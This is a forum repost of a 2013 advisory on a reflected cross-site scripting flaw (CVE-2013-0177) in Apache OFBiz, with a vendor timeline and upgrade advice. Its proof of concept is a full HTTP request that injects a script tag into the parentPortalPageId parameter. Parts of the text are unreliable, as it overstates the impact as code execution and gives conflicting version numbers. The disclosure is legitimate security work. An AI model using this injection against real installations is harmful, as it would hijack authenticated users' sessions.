Praetorian503 Posted January 21, 2013 Report Posted January 21, 2013 Apache OFBiz versions 10.04.05 and below and 11.04.01 and below suffer from a reflected cross site scripting vulnerability. Full exploitation details provided.Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBizType: RemoteAuthor: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb)CVE: CVE-2013-0177Impact: Direct execution of arbitrary code in the context of Webserver user.Release Date: 18.01.2013Summary=======Apache Open For Business (Apache OFBiz) is an open source enterpriseresource planning (ERP) system. It provides a suite of enterpriseapplications that integrate and automate many of the business processes ofan enterprise.Description===========Reflected Cross-Site Scripting Vulnerability affecting Screenlet.title andImage.alt Widget attributes because the content of these two elements isnot properly escaped.Vendor======Apache ofbiz - http://ofbiz.apache.org/PoC===It is worth mentioning that originally the resource was using the HTTPmethod POST, but it was changed to GET to exploit it more easily.Something important to remark is that for this attack to work, the victimshould be authenticated.Below you can see how the URL is specially crafted to expose the issue:Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages->parameter: parentPortalPageId==[XSS]GET/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script>HTTP/1.1Host: 10.10.10.14:8443User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101Firefox/17.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3Connection: keep-aliveReferer:https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1;OFBiz.Visitor=10002Solution========10.04.* users should upgrade to 10.04.0511.04.01 users should upgrade to 11.04.02Vendor Status=============[08.01.2013] Vulnerability discovered.[09.01.2013] Vendor informed.[09.01.2013] Vendor replied.[12.01.2013] Vendor reveals patch release date.[18.01.2013] Public advisory.Source: PacketStorm Quote